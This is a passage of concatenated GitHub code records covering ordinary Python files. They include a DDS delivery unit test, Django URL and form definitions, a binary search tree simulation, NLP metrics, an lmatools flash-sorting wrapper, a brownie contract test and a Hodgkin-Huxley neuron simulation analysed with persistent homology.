project_metadata['researchers'][1],\n ])\n\n @gen_test\n def test_release_project(self):\n project_id = 'snpseq00001'\n deadline = '90'\n email = True\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n yield dds_project.release(\n deadline=deadline,\n email=email,\n )\n\n self.mock_dds_runner.run.assert_called_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'status', 'release',\n '--project', project_id,\n '--deadline', deadline,\n ])\n\n @gen_test\n def test_release_project_nomail(self):\n project_id = 'snpseq00001'\n deadline = '90'\n email = False\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n yield dds_project.release(\n deadline=deadline,\n email=email,\n )\n\n self.mock_dds_runner.run.assert_called_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'status', 'release',\n '--project', project_id,\n '--deadline', deadline,\n '--no-mail',\n ])\n\n @gen_test\n def test_get_dds_project_title(self):\n mock_dds_project = [{\n \"Access\": True,\n \"Last updated\": \"Fri, 01 Jul 2022 14:31:13 CEST\",\n \"PI\": \"pi@email.com\",\n \"Project ID\": \"snpseq00025\",\n \"Size\": 25856185058,\n \"Status\": \"In Progress\",\n \"Title\": \"AB1234\"\n }]\n\n with patch(\n 'delivery.models.project.DDSProject._run',\n new_callable=AsyncMock,\n return_value=json.dumps(mock_dds_project),\n ):\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=mock_dds_project[0][\"Project ID\"],\n )\n\n ngi_project_name = yield dds_project.get_ngi_project_name()\n self.assertEqual(ngi_project_name, \"AB-1234\")\n","repo_name":"arteria-project/arteria-delivery","sub_path":"tests/unit_tests/services/test_dds.py","file_name":"test_dds.py","file_ext":"py","file_size_in_byte":15302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69965631192","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^getMessages$', views.getMessages, name='getMessages'),\n url(r'^sendMessage$', views.sendMessage, name='sendMessage'),\n\n url(r'^login$', views.login, name='login'), \n url(r'^accounts/login/$', views.login, name='login'),\n url(r'^logout$', views.logout, name='logout'),\n\n url(r'^sendPublicKey$', views.sendPublicKey, name='sendPublicKey'),\n]","repo_name":"kasper512/ChiffresMedia","sub_path":"webServer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"386817924","text":"import javalang\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ndata = {}\r\nmethods =[]\r\ngod_class = {}\r\n\r\nfor paths, dirs, files in os.walk(\"./project-1-god-classes-ZhiziWen-main/resources/xerces2-j-src\", topdown =\"true\"):\r\n for name in files:\r\n if '.java' in name:\r\n fullpath = os.path.join(paths, name)\r\n f = open(fullpath, 'r')\r\n f_read = f.read()\r\n tree = javalang.parse.parse(f_read)\r\n for path, node in tree:\r\n if type(node) is javalang.tree.ClassDeclaration:\r\n methods.append(len(node.methods))\r\n data[node.name] = len(node.methods)\r\n\r\naverage = np.mean(methods)\r\nstd = np.std(methods)\r\nthreshold_god = average + 6 * std\r\n\r\nfor key in data:\r\n if data[key] > threshold_god:\r\n god_class[key] = data[key]\r\ngod_df = pd.DataFrame(god_class.items(), columns=['class_name','method_num'])\r\nprint(god_df)\r\n\r\n\r\n","repo_name":"ZhiziWen/God-class-recognition-clustering-and-evaluation","sub_path":"find_god_class.py","file_name":"find_god_class.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16844907735","text":"from typing import Any, Dict, List, Optional, Union\n\nclass Node:\n\n left = None\n right = None\n\n def __init__(self, key : Any = None, value : int = None, size : int = 1) -> None:\n\n self.key = key\n self.value = value\n self.size = size\n \n\n def print(self):\n\n string = self.print_string()\n\n if self.left is not None:\n string += f'. Left - {self.left.print_string()}'\n\n if self.right is not None:\n string += f'. Right - {self.right.print_string()}'\n\n print(string)\n\n def print_string(self):\n return (f'Node key: {self.key}, value: {self.value}')\n\nclass BinarySearchTree:\n\n root = None\n compares = 0\n\n def size(self) -> int:\n return self.size_(self.root)\n\n def size_(self, node : Node) -> int:\n\n if node is None:\n return 0\n else:\n return node.size\n\n def compare(self, key_1 : Any, key_2 : Any) -> int:\n\n if key_1 > key_2:\n self.compares += 1\n return -1\n elif key_1 < key_2:\n self.compares += 2\n return 1\n else:\n self.compares += 2\n return 0\n\n\n def put(self, key : Any, value : int) -> Node:\n\n # Reset compares\n self.compares = 0\n\n self.root = self.put_(node = self.root, key = key, value = value)\n\n def put_(self, node : Node, key : Any, value : int) -> Node:\n\n if node is None:\n return Node(key = key, value = value)\n \n compared = self.compare(key_1=node.key, key_2=key)\n\n if compared < 0:\n node.left = self.put_(node = node.left, key = key, value = value)\n elif compared > 0:\n node.right = self.put_(node = node.right, key = key, value = value)\n # If the key is a match, overwrite value\n else:\n node.value = value\n\n node.size = self.size_(node.left) + self.size_(node.right) + 1\n\n # Return the node\n return node\n\n def get(self, key : Any) -> Node:\n\n # Reset compares\n self.compares = 0\n\n return self.get_(node = self.root, key = key)\n\n def get_(self, node : Node, key : Any) -> Any:\n\n if node is None:\n return None\n\n compared = self.compare(key_1=node.key, key_2=key)\n\n if compared < 0:\n return self.get_(node = node.left, key = key)\n elif compared > 0:\n return self.get_(node = node.right, key = key)\n # If the key is a match, overwrite value\n else:\n return node.value\n\n\nnode = Node(key='hello', value=1)\nnode.print()\n\nbst = BinarySearchTree()\n\nbst.put(key='hello', value=1)\nbst.put(key='a', value=2)\nbst.put(key='k', value=3)\n \nbst.root.print()\n\nval = bst.get('k')\nprint(f'Val for key k: {val}')\n\nprint(f'BST size: {bst.size()}')\n\n\nimport random\nimport string\n\n\ntests = 1000\n\ntest_bst = BinarySearchTree()\ntest_dict = {}\n\nfor n in range(tests):\n\n key = random.randint(0, tests)#random.choice(string.ascii_letters)\n value = random.randint(0, tests)\n print(key, value)\n test_dict[key] = value\n\n test_bst.put(key=key, value=value)\n\n print(f'Put key: {key}, value: {value}, BST size: {test_bst.size()}')\n\nfor key, value_true in test_dict.items():\n\n value = test_bst.get(key)\n print(f'key: {key}, value_true: {value_true}, value: {value}, BST size: {test_bst.size()}, compares: {test_bst.compares}')\n\n assert value == value_true\n\n\nnum_tests = 1000\nmax_entries = 100\n\n\ncompares_result = []\nbst_size = []\n\n\n\nfor n in range(num_tests):\n print(f'Test {n} of {num_tests}')\n entries = random.randint(1, max_entries+1)\n\n test_bst = BinarySearchTree()\n\n for m in range(entries):\n\n key = random.randint(0, entries)\n value = random.randint(0, entries)\n\n test_bst.put(key=key, value=value)\n\n compares_result += [test_bst.compares]\n bst_size += [test_bst.size()]\n\n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nresults = pd.DataFrame({'size':bst_size, 'compares':compares_result})\n\ncompares_average_result = []\nsize_average = []\n\nfor size in results['size'].unique():\n\n size_average += [size]\n\n compares_average_result += [results[results['size'] == size]['compares'].mean()]\n\nprint(results)\n\nplt.figure()\nplt.scatter(bst_size, compares_result, alpha=0.2)\nplt.plot(size_average, compares_average_result, label='Compares average', alpha=1, color='C1')\nplt.title('Simulation output')\nplt.xlabel('BST Size [Nodes]')\nplt.ylabel('Compares')\nplt.legend()\nplt.savefig('simulation_output/binary_search_tree/compares.png')\n\nplt.close()","repo_name":"asmusbhansen/clrs","sub_path":"clrs/data_structures/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6436256513","text":"import numpy as np\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import validation_curve\nfrom direction.MLP_Classifier import get_data\n\nif __name__ == \"__main__\":\n data, label,_ = get_data(path=\"data/\")\n\n print(data.shape)\n print(label.shape)\n\n\n param_range = ['identity', 'logistic', 'tanh', 'relu']\n\n train_score, test_score = validation_curve(\n MLPClassifier(hidden_layer_sizes=(200,), learning_rate_init=0.01,\n activation=\"relu\", solver='adam', max_iter=500),\n data, label,\n param_name='activation',\n param_range=param_range, cv=10, scoring='accuracy')\n\n train_score = np.mean(train_score, axis=1)\n test_score = np.mean(test_score, axis=1)\n\n print(param_range)\n print(train_score)\n print(test_score)\n","repo_name":"qinqiang1990/zto","sub_path":"direction/Selection_MLP_Classifier.py","file_name":"Selection_MLP_Classifier.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44152192565","text":"from django import forms\nfrom django.forms import ModelForm\nfrom almacen.models import Tipo, Almacen, Zona, Suministro, GrupoSuministros\nfrom usuarios.models import Empresa\n\nclass UploadForm(forms.Form):\n docfile = forms.FileField(label='Selecciona un archivo')\n\nclass TipoIngresoForm(forms.ModelForm):\n\n class Meta:\n model = Tipo\n fields =['codigo','descripcion_valor']\n\n def __init__(self, *args, **kwargs):\n self.tabla = \"tipo_Ingreso\"\n self.descripcion_campo = \"tipo_Ingreso\"\n super(TipoIngresoForm, self).__init__(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n self.instance.tabla = self.tabla\n self.instance.descripcion_campo = self.descripcion_campo\n super(TipoIngresoForm, self).save(*args, **kwargs)\n\nclass TipoUnidadForm(forms.ModelForm):\n\n class Meta:\n model = Tipo\n fields =['codigo','descripcion_valor']\n\n def __init__(self, *args, **kwargs):\n self.tabla = \"tipo_unidad_medida\"\n self.descripcion_campo = \"tipo_unidad_medida\"\n super(TipoUnidadForm, self).__init__(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n self.instance.tabla = self.tabla\n self.instance.descripcion_campo = self.descripcion_campo\n super(TipoUnidadForm, self).save(*args, **kwargs) \n\nclass TipoStockForm(forms.ModelForm):\n\n class Meta:\n model = Tipo\n fields =['codigo','descripcion_valor']\n\n def __init__(self, *args, **kwargs):\n self.tabla = \"tipo_stock\"\n self.descripcion_campo = \"tipo_stock\"\n super(TipoStockForm, self).__init__(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n self.instance.tabla = self.tabla\n self.instance.descripcion_campo = self.descripcion_campo\n super(TipoStockForm, self).save(*args, **kwargs) \n\nclass AlmacenForm(forms.ModelForm):\n\n def __init__(self, empresa,*args, **kwargs):\n super(AlmacenForm, self).__init__(*args, **kwargs)\n self.fields['empresa'].queryset = Empresa.objects.filter(codigo=empresa.codigo) \n\n class Meta:\n model = Almacen\n fields =['descripcion','empresa','zona']\n\nclass ZonaForm(forms.ModelForm):\n\n class Meta:\n model = Zona\n fields =['descripcion']\n\nclass GrupoSuministrosForm(forms.ModelForm):\n\n class Meta:\n model = GrupoSuministros\n fields = ['descripcion','ctaalm','ctacomp']\n\n \n\nclass SuministroForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(SuministroForm, self).__init__(*args, **kwargs)\n self.fields['tipo_unidad_medida'].queryset = Tipo.objects.filter(tabla=\"tipo_unidad_medida\")\n self.fields['tipo_stock'].queryset = Tipo.objects.filter(tabla=\"tipo_stock\")\n\n class Meta:\n model = Suministro\n fields =['descripcion', 'precio_mercado', 'grupo_suministros','tipo_unidad_medida','tipo_stock'] ","repo_name":"joseamaya/almacen","sub_path":"almacen/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"65249848","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport os, sys, re\nimport glob\nimport tempfile\nimport shutil\nimport subprocess\nimport logging, logging.handlers\nimport datetime\n\nfrom lmatools.flashsort.flash_stats import calculate_flash_stats, Flash, FlashMetadata\nfrom lmatools.io.LMAarrayFile import cat_LMA, LMAdataFile\n\nfrom .mflash import write_header\n\nLOG_BASEFILENAME = datetime.datetime.now().strftime('Flash-autosort.log')\n\n\ndef logger_setup(logpath):\n logger = logging.getLogger('FlashAutorunLogger')\n logfile = os.path.join(logpath, LOG_BASEFILENAME)\n loghandler = logging.handlers.RotatingFileHandler(logfile, maxBytes=1024*1024, backupCount=3)\n logger.addHandler(loghandler)\n logger.setLevel(logging.DEBUG)\n\n\n# assume that source code for the flash program is in the same directory as this module\ntry:\n src_dir = os.path.dirname(__file__)\nexcept:\n src_dir = os.getcwd()\n \nbuild_files = ( #'mflashcustom.f',\n 'makefile',\n )\n \nflash_output_dir = 'output' # created within the build directory\nflash_prg_name = 'mflashcustom' # created within the build directory\n\ntmp_flashsort_prepend = 'flashsort_'\n\ndef build(directory=None, mflash_params=None):\n \"\"\" Build the flash program in directory; a temporary directory is created by default. \"\"\"\n \n\n if directory == None:\n d = tempfile.mkdtemp('', tmp_flashsort_prepend)\n else:\n d = directory\n \n write_header(os.path.join(d,'mflashcustom.f'), **mflash_params)\n\n for filename in build_files:\n shutil.copyfile(os.path.join(src_dir, filename),\n os.path.join(d, filename))\n \n os.chdir(d)\n os.mkdir(flash_output_dir)\n \n make_cmd = ['make','-f','makefile']\n rc = subprocess.call(make_cmd)\n \n return d\n \n\ndef cleanup_build(directory):\n logger = logging.getLogger('FlashAutorunLogger')\n \n if tmp_flashsort_prepend in directory:\n shutil.rmtree(directory)\n else:\n logger.warning( \n \"Temporary build directory %s doesn't appear to be a flashsort directory.\" % (directory,)\n )\n \n\n \n\ndef sort_file(filename, directory):\n \"\"\" Sort one LMA data file into flashes. dir is the directory with the flash program\"\"\"\n logger = logging.getLogger('FlashAutorunLogger')\n \n f, command, the_input = cat_LMA(filename)\n \n run_cmd = [os.path.join(directory, flash_prg_name)]\n logger.info( 'Running %s' % (run_cmd,)) #, 'with stdin from ', command \n \n # comment out stdout=subprocess.PIPE to print stdout to the terminal. when uncommented,\n # stdout is captured to python, which leads to less noise in the terminal\n p = subprocess.Popen(run_cmd, stdin=f.stdout, stdout=subprocess.PIPE)#, preexec_fn=f.stdin.close)\n \n # The communication step is key to not blocking at completion.\n out, err = p.communicate()#input=the_input) #out, err not connected to pipes, so nothing to capture or print\n \n # print out\n # print 'Errors: ', err\n return out, err\n \n \n\ndef collect_output(datafile, min_points=1, mask_length=4):\n \"\"\" collect all output from the flash program output directory created by\n the flash program in flash_dir and calculate some additional stats on each flash \n \"\"\"\n import numpy as np\n \n logger = logging.getLogger('FlashAutorunLogger')\n \n # outdir = os.path.join(flash_dir,flash_output_dir)\n # os.chdir(outdir)\n \n lma = LMAdataFile(datafile, mask_length=mask_length)\n \n # get the mapping from flash_ids to the points\n order = np.argsort(lma.flash_id)\n \n # In the case of no data in the file, lma.data.shape will have length zero, i.e., a 0-d array\n if len(lma.data.shape) == 0:\n # No data\n flashes = []\n else:\n flid = lma.flash_id[order]\n boundaries, = np.where(flid[1:]-flid[:-1]) # where indices are nonzero\n boundaries = np.hstack(([0], boundaries+1))\n \n all_data = lma.data[order]\n \n max_idx = len(flid) #- 1\n slice_lower_edges = tuple(boundaries)\n slice_upper_edges = slice_lower_edges[1:] + (max_idx,)\n slices = list(zip(slice_lower_edges, slice_upper_edges))\n \n flashes = [ Flash(all_data[slice(*sl)]) for sl in slices ]\n \n # calculate extra flash metadata, e.g., initation, centroid\n logtext = \"Calculating flash initation, centroid, area, etc. for %d flashes\" % (len(flashes), )\n logger.info(logtext)\n # print flashes[0].points.dtype\n for fl in flashes:\n header = ''.join(lma.header)\n fl.metadata = FlashMetadata(header)\n calculate_flash_stats(fl)\n \n return lma, flashes\n\n\n\ndef cluster(a_file, output_path, outfile, params, logger, min_points=1, retain_ascii_output=True, cleanup_tmp=True):\n # logger = logging.getLogger('FlashAutorunLogger')\n \n now = datetime.datetime.now().strftime('mflash run started %Y%m%d-%H%M%S')\n logger.info(now)\n \n \n d = build(mflash_params=params) # returns temporary directory name\n logger.debug('Built flash program in %s' % d)\n\n logger.info('Sorting flashes for %s' % a_file)\n out, err = sort_file(a_file, d) # out contains sorted flash data (via stdout)\n # print out\n\n\n # file_base_name = os.path.split(a_file)[-1].replace('.gz', '')\n # print 'filebase = ', file_base_name\n # outfile = os.path.join(output_path, file_base_name+'.flash.h5')\n # write_output(outfile, flashes, file_base_name)\n # print 'Wrote original data and flashes to ', outfile\n\n # outfile = os.path.join(output_path, file_base_name+'.flash')\n shutil.copyfile(os.path.join(d, 'flashes_out.dat'),\n outfile) \n \n if 'mask_length' in params:\n mask_length = params['mask_length']\n else:\n mask_length = 4\n lmadata, flashes = collect_output(outfile, mask_length=mask_length)#, min_points=min_points)\n\n if retain_ascii_output==False:\n os.remove(outfile)\n else:\n logger.info('Wrote ascii event and flash data to %s' % outfile)\n if cleanup_tmp == True:\n result = cleanup_build(d)\n else:\n logger.warning('did not delete flashsort directory in /tmp')\n \n return lmadata, flashes\n\n\ndef test_output():\n import tables as T\n h5 = T.openFile('/Users/ebruning/out/LYLOUT_040526_213000_0600.dat.gz.flash.h5')\n flashes = h5.root.flashes.LMA_040526_213000_600\n events = h5.root.events.LMA_040526_213000_600\n # flashes.cols.n_points[0:100]\n big = [fl['flash_id'] for fl in flashes if fl['n_points'] > 100]\n a_flash = big[0]\n points = [ev['lat'] for ev in events if ev['flash_id'] == a_flash]\n print(flashes.cols.init_lon[0:10])\n\n\n","repo_name":"deeplycloudy/lmatools","sub_path":"lmatools/flashsort/autosort/autorun_mflash.py","file_name":"autorun_mflash.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"5"} +{"seq_id":"4769589104","text":"import torch\n\nfrom torch.nn import functional as F\nfrom nltk.translate import bleu_score\nfrom sklearn.metrics import accuracy_score, f1_score\n\ndef normalize_sizes(y_pred, y_true):\n \"\"\"텐서 크기 정규화\n \n 매개변수:\n y_pred (torch.Tensor): 모델의 출력\n 3차원 텐서이면 행렬로 변환합니다.\n y_true (torch.Tensor): 타깃 예측\n 행렬이면 벡터로 변환합니다.\n \"\"\"\n if len(y_pred.size()) == 3:\n y_pred = y_pred.contiguous().view(-1, y_pred.size(2))\n if len(y_true.size()) == 2:\n y_true = y_true.contiguous().view(-1)\n return y_pred, y_true\n\ndef compute_accuracy_mt(y_pred, y_true, mask_index):\n y_pred, y_true = normalize_sizes(y_pred, y_true)\n\n _, y_pred_indices = y_pred.max(dim=1)\n \n correct_indices = torch.eq(y_pred_indices, y_true).float()\n valid_indices = torch.ne(y_true, mask_index).float()\n \n n_correct = (correct_indices * valid_indices).sum().item()\n n_valid = valid_indices.sum().item()\n\n return n_correct / n_valid * 100\n\ndef compute_accuracy_tl(y_pred, y_true, x_source, mask_index):\n\n correct_indices = torch.eq(y_pred, y_true).float()\n valid_indices = torch.ne(x_source, mask_index).float()\n\n n_correct = (correct_indices * valid_indices).sum().item()\n n_valid = valid_indices.sum().item()\n\n return n_correct / n_valid * 100\n\n\ndef sequence_loss(y_pred, y_true, mask_index):\n y_pred, y_true = normalize_sizes(y_pred, y_true)\n return F.cross_entropy(y_pred, y_true, ignore_index=mask_index)\n\ndef compute_bleu_score(y_pred, y_true, weights=(0.25, 0.25, 0.25, 0.25)):\n return bleu_score.corpus_bleu(list_of_references=[[ref] for ref in y_true], \n hypotheses=y_pred, \n weights=weights,\n smoothing_function=bleu_score.SmoothingFunction().method1)","repo_name":"BlessingDev/NLP-Standard-Dialect-Transformation","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22465442061","text":"from brownie import SimpleStorage, accounts\n\n\n# first true\ndef test_deploy():\n account = accounts[0]\n simple_storage = SimpleStorage.deploy({\"from\": account})\n starting_value = simple_storage.retrieve()\n expected = 0\n\n # assert\n assert expected == starting_value\n\n# Khi sai chay brownie test --pdb de vao consolog va xuat ra ket qua\n# Chay kiem tra cac bien o terminal\ndef test_update_stogare():\n # arrange\n account = accounts[0]\n #print(account)\n # simple from account 0\n simple_storage = SimpleStorage.deploy({\"from\": account})\n\n #Act\n expected = 15\n simple_storage.store(expected, {\"from\": account })\n # Cha su ket qua la 5 de xem test co dung khong\n assert 5 == simple_storage.retrieve()\n\ndef main():\n test_deploy()","repo_name":"huonghope/learn-blockchain2","sub_path":"freecode/brownie_simple_storage/tests/test_simple_storage.py","file_name":"test_simple_storage.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37508726367","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport gudhi as gd\nimport gudhi.representations\nfrom scipy.signal import find_peaks\n\ndt = 0.05\nt = np.linspace(0, 10, 10000)\n\n#constants\nmu = 4.5#7#put 7 when without noise\nc_m = 1.0 #microFarad\nv_Na = 50 #miliVolt\nv_K = -77 #miliVolt\nv_l = -54 #miliVolt\ng_Na = 120 #mScm-2\ng_K = 36 #mScm-2\ng_l = 0.03 #mScm-2\n\n#nonlinearities\nalpha_N = lambda v: 0.01 * (v + 50) / (1 - np.exp(- (v + 50) / 10))\nbeta_N = lambda v: 0.125 * np.exp(- (v + 60) / 80)\nalpha_M = lambda v: 0.1 * (v + 35) / (1 - np.exp(- (v + 35) / 10))\nbeta_M = lambda v: 4.0 * np.exp(- 0.0556 * (v + 60))\nalpha_H = lambda v: 0.07 * np.exp(- 0.05 * (v + 60))\nbeta_H = lambda v: 1 / (1 + np.exp(- (0.1) * (v + 30)))\n\n\nsqrtdt = np.sqrt(dt) #Euler-Maruyama\n\nneurons = np.empty([2, len(t)])\n#temporary = []\n#run multiple independent compartments\nfor k in range(0, 2):\n #intitial conditions:\n #state variables\n V = []\n M = []\n H = []\n N = []\n# temporary = []\n # temporary.append(mu)\n V.append(-60)\n M.append(alpha_M(V[0]) / (alpha_M(V[0]) + beta_M(V[0])))\n N.append(alpha_N(V[0]) / (alpha_N(V[0]) + beta_N(V[0])))\n H.append(alpha_H(V[0]) / (alpha_H(V[0]) + beta_H(V[0])))\n\n for i in range(1, len(t)):\n M.append(M[i-1] + dt * ((alpha_M(V[i-1]) * (1 - M[i-1])) - beta_M(V[i-1]) * M[i-1]))\n N.append(N[i-1] + dt * ((alpha_N(V[i-1]) * (1 - N[i-1])) - beta_N(V[i-1]) * N[i-1]))\n H.append(H[i-1] + dt * ((alpha_H(V[i-1]) * (1 - H[i-1])) - beta_H(V[i-1]) * H[i-1]))\n\n #additive current terms\n I_Na = g_Na * H[i-1] * M[i-1] ** 3 * (V[i-1] - v_Na)\n I_K = g_K * N[i-1] ** 4 * (V[i-1] - v_K)\n I_l = g_l * (V[i-1] - v_l) \n I_noise = sqrtdt * np.random.randn()\n #temporary.append(((1 / c_m) * (mu - (I_Na + I_K + I_l))))\n V.append(V[i-1] + (dt) * ((1 / c_m) * (mu - (I_Na + I_K + I_l))) + I_noise)\n \n neurons[k-1, :] = V\n\nprint(np.shape(neurons))\nprint(max(neurons[0,:]))\nprint(max(neurons[1,:]))\n\ntimesA = (neurons[0, :] > 41) * neurons[0, :]\ntimesB = (neurons[1, :] > 41) * neurons[1, :]\n\n#timesA2 = np.argwhere(neurons[0, :] > 41)\n#timesB2 = np.argwhere(neurons[1, :] > 41)\n\n#windowsA = np.empty([len(timesA2), 70])\n#for j in range(0, len(timesA2)):\n# print(timesA2[j][0])\n# leftEnd = timesA2[j][0] - 35\n# rightEnd = timesA2[j][0] + 35\n# print(np.shape(neurons[0, leftEnd:rightEnd]))# : timesA2[j][0]+35)\n# windowsA[j, :] = neurons[0, leftEnd:rightEnd]\n\n#windowsB = np.empty([len(timesB2), 70])\n#for j in range(0, len(timesB2)):\n# print(timesA2[j][0])\n# leftEnd = timesB2[j][0] - 35\n# rightEnd = timesB2[j][0] + 35\n# print(np.shape(neurons[0, leftEnd:rightEnd]))# : timesA2[j][0]+35)\n# windowsB[j, :] = neurons[1, leftEnd:rightEnd]\n#print(np.shape(windowsA))\n#print(len(timesA2))\n#print(np.shape(windowsB))\n#print(len(timesB2))\n\npeaksA, _ = find_peaks(neurons[0, :], prominence=40)\n#print(\"peaksA\")\n#print(len(peaksA))\n#print(peaksA)\npeaksB, _ = find_peaks(neurons[1, :], prominence=40)\n#print(\"peaksB\")\n#print(len(peaksB))\n#print(peaksB)\n\nwindowsA = np.empty([len(peaksA), 300])\nfor j in range(0, len(peaksA)):\n leftEnd = peaksA[j] - 20\n rightEnd = peaksA[j] + 280\n windowsA[j, :] = neurons[0, leftEnd:rightEnd]\n\nwindowsB = np.empty([len(peaksB), 300])\nfor j in range(0, len(peaksB)):\n leftEnd = peaksB[j] - 20\n rightEnd = peaksB[j] + 280\n windowsB[j, :] = neurons[1, leftEnd:rightEnd]\n \nprint(np.shape(windowsA))\nprint(len(peaksA))\nprint(np.shape(windowsB))\nprint(len(peaksB))\n\n\n\n\n\n\ntW = np.linspace(0, 10, 300)\nplt.figure(figsize=(9, 3))\n#plt.plot(tW, windowsA[0,:], 'r-',label='voltage')\nplt.plot(tW[::10], windowsA[0,::10], 'r-',label='voltage')\n\n#figN,figM = np.shape(windowsA)\n#for k in range(0,figN*figM):\n# plt.subplot(figN*figM, 1, k + 1)\n# plt.plot(tW[::10], windowsA[0,::10], 'r-',label='voltage')\n\n\n\nplt.figure(figsize=(9, 3))\nplt.subplot(4, 1, 1)\nplt.plot(t, timesA, 'g-',label='voltage')\nplt.subplot(4, 1, 2)\nplt.plot(t, neurons[0, :], 'b-',label='voltage')\nplt.subplot(4, 1, 3)\nplt.plot(t, timesB, 'g-',label='voltage')\nplt.subplot(4, 1, 4)\nplt.plot(t, neurons[1, :], 'b-',label='voltage')\n\nelectrode = np.empty([4, len(t)])\nelectrode[0, :] = -1.0 * neurons[0, :] + (-1.0) * neurons[1, :] / 2.0\nelectrode[1, :] = (-1.0/np.sqrt(2)) * neurons[0, :] + (-1.0/np.sqrt(2)) * neurons[1, :] / 2.0\nelectrode[2, :] = -0.5 * neurons[0, :] + -0.5 * neurons[1, :] / 2.0\nelectrode[3, :] = (-1.0/np.sqrt(5)) * neurons[0, :] + (-1.0/np.sqrt(5)) * neurons[1, :] / 2.0\n\nnumwinA, _ = np.shape(windowsA)\nnumwinB, _ = np.shape(windowsB)\n\nprint(numwinA)\nfieldA = np.empty([27000, numwinA])\n#for j in range(0, numwinA):\n# print(j)\nfor i in range(0, numwinA):\n# print (i)\n# print(windowsA[i,::10])\n V_x = -1.0 * windowsA[i,::10]\n V_y = (-1.0 / np.sqrt(2)) * windowsA[i, ::10]\n V_z = -0.5 * windowsA[i, ::10]\n V_w = (-1.0 / np.sqrt(5)) * windowsA[i, ::10]\n fieldA[:, i] = 0.5*(-1.0 * np.kron(np.kron(V_x, V_y), V_z) - 1.0 * np.kron(np.kron(V_y, V_z), V_w))\nprint(np.shape(fieldA))\n\nprint(numwinB)\nfieldB = np.empty([27000, numwinB])\n#for j in range(0, numwinA):\n# print(j)\nfor i in range(0, numwinB):\n# print (i)\n# print(windowsA[i,::10])\n V_x = -1.0 * windowsB[i,::10] / 2\n V_y = (-1.0 / np.sqrt(2)) * windowsB[i, ::10] / 2\n V_z = -0.5 * windowsB[i, ::10] / 2\n V_w = (-1.0 / np.sqrt(5)) * windowsB[i, ::10] / 2\n fieldB[:, i] = 0.5*(-1.0 * np.kron(np.kron(V_x, V_y), V_z) - 1.0 * np.kron(np.kron(V_y, V_z), V_w))\nprint(np.shape(fieldB))\n\nL_a = np.empty([numwinA, 5000])\nfor i in range(0, numwinA):\n cubical_complex = gd.CubicalComplex(\n dimensions=[30, 30, 30],\n top_dimensional_cells=fieldA[:, i],\n )\n diag = cubical_complex.persistence(homology_coeff_field=2, min_persistence=10)\n #gd.plot_persistence_diagram(diag)\n #print(cubical_complex.betti_numbers())\n\n LS = gd.representations.Landscape(resolution=1000)\n L_a[i, :] = LS.fit_transform([cubical_complex.persistence_intervals_in_dimension(2)])\n print(np.shape(L_a))\nL_hatA = np.mean(L_a, axis=0)\n\nL_b = np.empty([numwinB, 5000])\nfor i in range(0, numwinB):\n cubical_complex = gd.CubicalComplex(\n dimensions=[30, 30, 30],\n top_dimensional_cells=fieldB[:, i],\n )\n diag = cubical_complex.persistence(homology_coeff_field=2, min_persistence=10)\n #gd.plot_persistence_diagram(diag)\n #print(cubical_complex.betti_numbers())\n\n LS = gd.representations.Landscape(resolution=1000)\n L_b[i, :] = LS.fit_transform([cubical_complex.persistence_intervals_in_dimension(2)])\n print(np.shape(L_b))\nL_hatB = np.mean(L_b, axis=0)\n\n\n\n\nplt.figure(figsize=(9, 3))\nplt.subplot(2, 1, 1)\nplt.plot(L_hatA[:1000])\nplt.plot(L_hatA[1000:2000])\nplt.plot(L_hatA[2000:3000])\nplt.plot(L_hatA[3000:4000])\nplt.plot(L_hatA[4000:5000])\nplt.title(\"Landscape\")\nplt.subplot(2, 1, 2)\nplt.plot(L_hatB[:1000])\nplt.plot(L_hatB[1000:2000])\nplt.plot(L_hatB[2000:3000])\nplt.plot(L_hatB[3000:4000])\nplt.plot(L_hatB[4000:5000])\nplt.title(\"Landscape\")\n\n\nplt.figure(figsize=(9, 3))\nplt.subplot(4, 1, 1)\nplt.plot(t, electrode[0, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\nplt.subplot(4, 1, 2)\nplt.plot(t, electrode[1, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\nplt.subplot(4, 1, 3)\nplt.plot(t, 